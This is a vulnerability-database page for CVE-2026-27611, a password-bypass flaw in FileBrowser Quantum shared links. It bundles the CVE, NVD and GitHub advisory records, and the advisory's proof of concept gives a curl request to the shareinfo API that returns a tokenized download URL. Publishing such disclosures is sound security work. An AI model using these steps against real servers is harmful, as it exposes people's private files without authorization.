Vulnerability-Lookup

CVE-2026-27611 (GCVE-0-2026-27611)

Vulnerability from cvelistv5 – Published: 2026-02-25 02:24 – Updated: 2026-02-27 17:11

Title

FileBrowser Quantum: Password Protection Not Enforced on Shared File Links

Summary

FileBrowser Quantum is a free, self-hosted, web-based file manager. Prior to versions 1.1.3-stable and 1.2.6-beta, when users share password-protected files, the recipient can completely bypass the password and still download the file. This happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password. Versions 1.1.3-stable and 1.2.6-beta fix the issue.

Severity ?

7.1 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
CWE-288 - Authentication Bypass Using an Alternate Path or Channel
CWE-287 - Improper Authentication

Assigner

GitHub_M

References

URL

Tags

	https://github.com/gtsteffaniak/filebrowser/secur…	x_refsource_CONFIRM
	https://github.com/gtsteffaniak/filebrowser/commi…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	gtsteffaniak	filebrowser	Affected: < 1.1.3-stable Affected: >= 1.2.0-beta, < 1.2.6-beta

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-27611",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-27T17:11:11.814607Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-27T17:11:18.122Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "filebrowser",
          "vendor": "gtsteffaniak",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.1.3-stable"
            },
            {
              "status": "affected",
              "version": "\u003e= 1.2.0-beta, \u003c 1.2.6-beta"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "FileBrowser Quantum is a free, self-hosted, web-based file manager. Prior to versions 1.1.3-stable and 1.2.6-beta, when users share password-protected files, the recipient can completely bypass the password and still download the file. This happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password. Versions 1.1.3-stable and 1.2.6-beta fix the issue."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "LOW"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-288",
              "description": "CWE-288: Authentication Bypass Using an Alternate Path or Channel",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-287",
              "description": "CWE-287: Improper Authentication",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-25T02:24:48.357Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6"
        },
        {
          "name": "https://github.com/gtsteffaniak/filebrowser/commit/c51b0ee9738fa4599b409f47c5bf820ef31b4fe1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/gtsteffaniak/filebrowser/commit/c51b0ee9738fa4599b409f47c5bf820ef31b4fe1"
        }
      ],
      "source": {
        "advisory": "GHSA-8vrh-3pm2-v4v6",
        "discovery": "UNKNOWN"
      },
      "title": "FileBrowser Quantum: Password Protection Not Enforced on Shared File Links"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-27611",
    "datePublished": "2026-02-25T02:24:48.357Z",
    "dateReserved": "2026-02-20T19:43:14.602Z",
    "dateUpdated": "2026-02-27T17:11:18.122Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-27611\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-25T03:16:05.463\",\"lastModified\":\"2026-02-27T19:12:25.640\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"FileBrowser Quantum is a free, self-hosted, web-based file manager. Prior to versions 1.1.3-stable and 1.2.6-beta, when users share password-protected files, the recipient can completely bypass the password and still download the file. This happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password. Versions 1.1.3-stable and 1.2.6-beta fix the issue.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"},{\"lang\":\"en\",\"value\":\"CWE-287\"},{\"lang\":\"en\",\"value\":\"CWE-288\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:gtsteffaniak:filebrowser_quantum:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.1.3\",\"matchCriteriaId\":\"4375D364-0CCA-4F97-AEFA-4EE4D8F5646E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:gtsteffaniak:filebrowser_quantum:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.2.0\",\"versionEndExcluding\":\"1.2.6\",\"matchCriteriaId\":\"4087A9CC-6232-4DA2-96D5-0F5B86D7EFCD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:gtsteffaniak:filebrowser_quantum:1.1.3:beta:*:*:*:*:*:*\",\"matchCriteriaId\":\"9000A111-4C0C-4FC1-A3B4-C5BDB2C5AFE7\"}]}]}],\"references\":[{\"url\":\"https://github.com/gtsteffaniak/filebrowser/commit/c51b0ee9738fa4599b409f47c5bf820ef31b4fe1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-27611\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-27T17:11:11.814607Z\"}}}], \"references\": [{\"url\": \"https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-27T17:10:38.672Z\"}}], \"cna\": {\"title\": \"FileBrowser Quantum: Password Protection Not Enforced on Shared File Links\", \"source\": {\"advisory\": \"GHSA-8vrh-3pm2-v4v6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"gtsteffaniak\", \"product\": \"filebrowser\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.1.3-stable\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.2.0-beta, \u003c 1.2.6-beta\"}]}], \"references\": [{\"url\": \"https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6\", \"name\": \"https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/gtsteffaniak/filebrowser/commit/c51b0ee9738fa4599b409f47c5bf820ef31b4fe1\", \"name\": \"https://github.com/gtsteffaniak/filebrowser/commit/c51b0ee9738fa4599b409f47c5bf820ef31b4fe1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"FileBrowser Quantum is a free, self-hosted, web-based file manager. Prior to versions 1.1.3-stable and 1.2.6-beta, when users share password-protected files, the recipient can completely bypass the password and still download the file. This happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password. Versions 1.1.3-stable and 1.2.6-beta fix the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-288\", \"description\": \"CWE-288: Authentication Bypass Using an Alternate Path or Channel\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-287\", \"description\": \"CWE-287: Improper Authentication\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-25T02:24:48.357Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-27611\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-27T17:11:18.122Z\", \"dateReserved\": \"2026-02-20T19:43:14.602Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-25T02:24:48.357Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-27611

Vulnerability from fkie_nvd - Published: 2026-02-25 03:16 - Updated: 2026-02-27 19:12

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/gtsteffaniak/filebrowser/commit/c51b0ee9738fa4599b409f47c5bf820ef31b4fe1	Patch
security-advisories@github.com	https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6	Exploit, Vendor Advisory

Impacted products

Vendor	Product	Version
gtsteffaniak	filebrowser_quantum	*
gtsteffaniak	filebrowser_quantum	*
gtsteffaniak	filebrowser_quantum	1.1.3

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:gtsteffaniak:filebrowser_quantum:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "4375D364-0CCA-4F97-AEFA-4EE4D8F5646E",
              "versionEndExcluding": "1.1.3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:gtsteffaniak:filebrowser_quantum:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "4087A9CC-6232-4DA2-96D5-0F5B86D7EFCD",
              "versionEndExcluding": "1.2.6",
              "versionStartIncluding": "1.2.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:gtsteffaniak:filebrowser_quantum:1.1.3:beta:*:*:*:*:*:*",
              "matchCriteriaId": "9000A111-4C0C-4FC1-A3B4-C5BDB2C5AFE7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "FileBrowser Quantum is a free, self-hosted, web-based file manager. Prior to versions 1.1.3-stable and 1.2.6-beta, when users share password-protected files, the recipient can completely bypass the password and still download the file. This happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password. Versions 1.1.3-stable and 1.2.6-beta fix the issue."
    }
  ],
  "id": "CVE-2026-27611",
  "lastModified": "2026-02-27T19:12:25.640",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 7.1,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "LOW",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-25T03:16:05.463",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/gtsteffaniak/filebrowser/commit/c51b0ee9738fa4599b409f47c5bf820ef31b4fe1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        },
        {
          "lang": "en",
          "value": "CWE-287"
        },
        {
          "lang": "en",
          "value": "CWE-288"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-8VRH-3PM2-V4V6

Vulnerability from github – Published: 2026-02-25 16:00 – Updated: 2026-02-27 21:42

Summary

FileBrowser Quantum: Password Protection Not Enforced on Shared File Links

Details

Summary

When users share password-protected files, the recipient can completely bypass the password and still download the file.

Details

This happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password.

PoC

As an authenticated user, create a share for a file, with a password specified in "Optional password" (make sure to allow anonymous access as the PoC doesn't explain how to do this on a share that requires login, but it is also possible to do on a share that requires login, with some small tweaks to the API request)
Copy the first link (the clipboard WITHOUT an arrow) because the second one just completely skips the password without any effort required, which was mentioned in another vulnerability (https://github.com/filebrowser/filebrowser/security/advisories/GHSA-3v48-283x-f2w4)

Now, the link that was copied should look like: https://yourdomain/public/share/yoursharehash example: https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA

Now, make a API request with any api client to GET https://yourdomain/public/api/shareinfo?hash=(the share hash from the link) example: https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA

If curl is preferred, a (command line based API client), here's the command: curl 'https://yourdomain/public/api/shareinfo?hash=yoursharehash' -H 'Accept: */*' example: curl 'https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA' -H 'Accept: */*'

Example response:

{
    "shareTheme": "default",
    "title": "Shared files - IMG_20240814_213703451.jpg",
    "description": "A share has been sent to you to view or download.",
    "disableSidebar": false,
    "source": "/folder",
    "path": "/IMG_20240814_213703451.jpg/",
    "downloadURL": "https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D",
    "shareURL": "https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA",
    "enforceDarkLightMode": "default",
    "viewMode": "normal",
    "shareType": "normal",
    "sidebarLinks": [
        {
            "name": "Share QR Code and Info",
            "category": "shareInfo",
            "target": "#",
            "icon": "qr_code"
        },
        {
            "name": "Download",
            "category": "download",
            "target": "#",
            "icon": "download"
        }
    ],
    "hasPassword": true
}

Look at the downloadURL. It encodes the "&" symbol as "\u0026" so just replace "\u0026" with "&", example: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D should be changed to: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D

Then just copy paste the new link (example: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D) into any browser, and the file will download. All without giving a password.

Impact

This affects anyone who shares password-protected files.

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

7.1 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gtsteffaniak/filebrowser/backend"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260221163904-dbcfba993b85"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27611"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T16:00:49Z",
    "nvd_published_at": "2026-02-25T03:16:05Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nWhen users share password-protected files, the recipient can completely bypass the password and still download the file.\n\n### Details\nThis happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password.\n\n### PoC\n1. As an authenticated user, create a share for a file, with a password specified in \"Optional password\" (make sure to allow anonymous access as the PoC doesn\u0027t explain how to do this on a share that requires login, but it is also possible to do on a share that requires login, with some small tweaks to the API request)\n2. Copy the first link (the clipboard WITHOUT an arrow) because the second one just completely skips the password without any effort required, which was mentioned in another vulnerability (https://github.com/filebrowser/filebrowser/security/advisories/GHSA-3v48-283x-f2w4)\n\nNow, the link that was copied should look like:\nhttps://yourdomain/public/share/yoursharehash\nexample:\nhttps://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA\n\nNow, make a API request with any api client to GET \nhttps://yourdomain/public/api/shareinfo?hash=(the share hash from the link)\nexample:\nhttps://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA\n\nIf curl is preferred, a (command line based API client), here\u0027s the command:\n`curl \u0027https://yourdomain/public/api/shareinfo?hash=yoursharehash\u0027 -H \u0027Accept: */*\u0027`\nexample:\n`curl \u0027https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA\u0027 -H \u0027Accept: */*\u0027`\n\nExample response:\n```\n{\n    \"shareTheme\": \"default\",\n    \"title\": \"Shared files - IMG_20240814_213703451.jpg\",\n    \"description\": \"A share has been sent to you to view or download.\",\n    \"disableSidebar\": false,\n    \"source\": \"/folder\",\n    \"path\": \"/IMG_20240814_213703451.jpg/\",\n    \"downloadURL\": \"https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D\",\n    \"shareURL\": \"https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA\",\n    \"enforceDarkLightMode\": \"default\",\n    \"viewMode\": \"normal\",\n    \"shareType\": \"normal\",\n    \"sidebarLinks\": [\n        {\n            \"name\": \"Share QR Code and Info\",\n            \"category\": \"shareInfo\",\n            \"target\": \"#\",\n            \"icon\": \"qr_code\"\n        },\n        {\n            \"name\": \"Download\",\n            \"category\": \"download\",\n            \"target\": \"#\",\n            \"icon\": \"download\"\n        }\n    ],\n    \"hasPassword\": true\n}\n```\n\nLook at the downloadURL. It encodes the \"\u0026\" symbol as \"\\u0026\" so just replace \"\\u0026\" with \"\u0026\", example: \nhttps://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D\nshould be changed to:\nhttps://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D\n\nThen just copy paste the new link (example: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D) into any browser, and the file will download. All without giving a password.\n\n### Impact\nThis affects anyone who shares password-protected files.",
  "id": "GHSA-8vrh-3pm2-v4v6",
  "modified": "2026-02-27T21:42:54Z",
  "published": "2026-02-25T16:00:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-8vrh-3pm2-v4v6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27611"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/commit/a8c9b9419ec530568991a2f72cec4ed263f99e3c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/commit/c51b0ee9738fa4599b409f47c5bf820ef31b4fe1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gtsteffaniak/filebrowser"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2026-4546"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "FileBrowser Quantum: Password Protection Not Enforced on Shared File Links "
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
